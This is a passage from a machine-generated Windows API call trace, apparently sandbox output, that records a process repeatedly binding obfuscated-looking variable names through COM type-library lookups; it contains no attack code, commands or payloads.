ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.283] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fAkUABCD") returned 0x10c76a [0069.283] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="fAkUABCD" | out: _Dst="fAkUABCD") returned 0x0 [0069.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="fAkUABCD") returned 9 [0069.283] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.283] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="fAkUABCD", lHashVal=0x10c76a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.283] IUnknown:Release (This=0x665ba50) returned 0xd [0069.284] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.284] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="fAkUABCD", lHashVal=0x10c76a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.284] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.284] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.284] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="fAkUABCD", lHashVal=0x10c76a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.284] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.284] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.284] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="fAkUABCD", lHashVal=0x10c76a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.284] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80116, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="fAkUABCD") returned 9 [0069.284] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="fAkUABCD", lHashVal=0x10c76a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.284] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.284] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80116 | out: _Dst=0x67c2d40) returned 0x0 [0069.284] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_fAkUABCD") returned 0x109ef3 [0069.284] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_fAkUABCD" | out: _Dst="_B_var_fAkUABCD") returned 0x0 [0069.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_fAkUABCD") returned 16 [0069.284] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.284] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_fAkUABCD", lHashVal=0x109ef3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.284] IUnknown:Release (This=0x665ba50) returned 0xd [0069.284] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.284] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_fAkUABCD", lHashVal=0x109ef3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.284] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.284] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.284] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_fAkUABCD", lHashVal=0x109ef3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.284] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.284] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.284] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_fAkUABCD", lHashVal=0x109ef3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.284] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.285] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.285] IUnknown:Release (This=0x665ba50) returned 0xd [0069.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1202e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_fAkUABCD") returned 16 [0069.285] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_fAkUABCD", lHashVal=0x109ef3, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0) returned 0x0 [0069.285] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80116 | out: _Dst=0x144ec0) returned 0x0 [0069.285] ITypeComp:RemoteBind (in: This=0x665ba60, szName="TZQAAx", lHashVal=0x10a03b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80142, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="TZQAAx") returned 7 [0069.285] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="TZQAAx", lHashVal=0x10a03b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80142, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="TZQAAx") returned 7 [0069.285] ITypeComp:RemoteBind (in: This=0x665bd30, szName="TZQAAx", lHashVal=0x10a03b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.285] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TZQAAx") returned 0x10a03b [0069.285] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="TZQAAx" | out: _Dst="TZQAAx") returned 0x0 [0069.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="TZQAAx") returned 7 [0069.285] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.285] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="TZQAAx", lHashVal=0x10a03b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.285] IUnknown:Release (This=0x665ba50) returned 0xd [0069.285] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.285] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="TZQAAx", lHashVal=0x10a03b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.285] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.285] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.285] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="TZQAAx", lHashVal=0x10a03b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.286] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.286] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.286] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="TZQAAx", lHashVal=0x10a03b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.286] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80142, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="TZQAAx") returned 7 [0069.286] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="TZQAAx", lHashVal=0x10a03b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.286] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.286] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80142 | out: _Dst=0x67c2d40) returned 0x0 [0069.286] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_TZQAAx") returned 0x101aa5 [0069.286] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_TZQAAx" | out: _Dst="_B_var_TZQAAx") returned 0x0 [0069.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_TZQAAx") returned 14 [0069.286] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.286] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_TZQAAx", lHashVal=0x101aa5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.286] IUnknown:Release (This=0x665ba50) returned 0xd [0069.286] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.286] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_TZQAAx", lHashVal=0x101aa5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.286] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.286] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.286] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_TZQAAx", lHashVal=0x101aa5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.286] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.286] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.286] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_TZQAAx", lHashVal=0x101aa5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.286] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.286] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.286] IUnknown:Release (This=0x665ba50) returned 0xd [0069.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1205e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_TZQAAx") returned 14 [0069.286] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_TZQAAx", lHashVal=0x101aa5, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x54005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x54005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.287] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80142 | out: _Dst=0x144ec0) returned 0x0 [0069.287] ITypeComp:RemoteBind (in: This=0x665ba60, szName="YAcwAxc4", lHashVal=0x101375, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80192, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="YAcwAxc4") returned 9 [0069.287] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="YAcwAxc4", lHashVal=0x101375, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80192, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="YAcwAxc4") returned 9 [0069.287] ITypeComp:RemoteBind (in: This=0x665bd30, szName="YAcwAxc4", lHashVal=0x101375, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.287] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YAcwAxc4") returned 0x101375 [0069.287] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="YAcwAxc4" | out: _Dst="YAcwAxc4") returned 0x0 [0069.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="YAcwAxc4") returned 9 [0069.287] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.287] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="YAcwAxc4", lHashVal=0x101375, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.287] IUnknown:Release (This=0x665ba50) returned 0xd [0069.287] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.287] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="YAcwAxc4", lHashVal=0x101375, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.287] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.287] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.287] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="YAcwAxc4", lHashVal=0x101375, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.287] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.287] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.287] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="YAcwAxc4", lHashVal=0x101375, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.287] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80192, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="YAcwAxc4") returned 9 [0069.288] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="YAcwAxc4", lHashVal=0x101375, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.288] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.288] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80192 | out: _Dst=0x67c2d40) returned 0x0 [0069.288] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_YAcwAxc4") returned 0x10eb3d [0069.288] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_YAcwAxc4" | out: _Dst="_B_var_YAcwAxc4") returned 0x0 [0069.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_YAcwAxc4") returned 16 [0069.288] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.288] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_YAcwAxc4", lHashVal=0x10eb3d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.288] IUnknown:Release (This=0x665ba50) returned 0xd [0069.288] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.288] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_YAcwAxc4", lHashVal=0x10eb3d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.288] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.288] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.288] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_YAcwAxc4", lHashVal=0x10eb3d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.288] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.288] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.288] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_YAcwAxc4", lHashVal=0x10eb3d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.288] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.288] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.288] IUnknown:Release (This=0x665ba50) returned 0xd [0069.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1208e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_YAcwAxc4") returned 16 [0069.288] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_YAcwAxc4", lHashVal=0x10eb3d, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x41007700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x41007700000000, pDummy=0x0) returned 0x0 [0069.288] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80192 | out: _Dst=0x144ec0) returned 0x0 [0069.289] ITypeComp:RemoteBind (in: This=0x665ba60, szName="oXcQCw", lHashVal=0x109149, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8016a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="oXcQCw") returned 7 [0069.289] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="oXcQCw", lHashVal=0x109149, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8016a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="oXcQCw") returned 7 [0069.289] ITypeComp:RemoteBind (in: This=0x665bd30, szName="oXcQCw", lHashVal=0x109149, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.289] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oXcQCw") returned 0x109149 [0069.289] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="oXcQCw" | out: _Dst="oXcQCw") returned 0x0 [0069.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="oXcQCw") returned 7 [0069.289] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.289] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="oXcQCw", lHashVal=0x109149, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.289] IUnknown:Release (This=0x665ba50) returned 0xd [0069.289] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.289] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="oXcQCw", lHashVal=0x109149, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.289] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.289] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.289] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="oXcQCw", lHashVal=0x109149, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.289] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.289] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.289] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="oXcQCw", lHashVal=0x109149, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.289] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8016a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="oXcQCw") returned 7 [0069.289] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="oXcQCw", lHashVal=0x109149, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.289] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.289] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8016a | out: _Dst=0x67c2d40) returned 0x0 [0069.290] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_oXcQCw") returned 0x100bb3 [0069.290] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_oXcQCw" | out: _Dst="_B_var_oXcQCw") returned 0x0 [0069.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_oXcQCw") returned 14 [0069.290] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.290] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_oXcQCw", lHashVal=0x100bb3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.290] IUnknown:Release (This=0x665ba50) returned 0xd [0069.290] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.290] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_oXcQCw", lHashVal=0x100bb3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.290] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.290] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.290] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_oXcQCw", lHashVal=0x100bb3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.290] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.290] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.290] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_oXcQCw", lHashVal=0x100bb3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.290] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.290] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.290] IUnknown:Release (This=0x665ba50) returned 0xd [0069.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b120be, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_oXcQCw") returned 14 [0069.290] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_oXcQCw", lHashVal=0x100bb3, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x43005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x43005100000000, pDummy=0x0) returned 0x0 [0069.290] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8016a | out: _Dst=0x144ec0) returned 0x0 [0069.290] ITypeComp:RemoteBind (in: This=0x665ba60, szName="sU1AAUAC", lHashVal=0x104d81, wFlags=0x3, ppTInfo=0x144cf8, 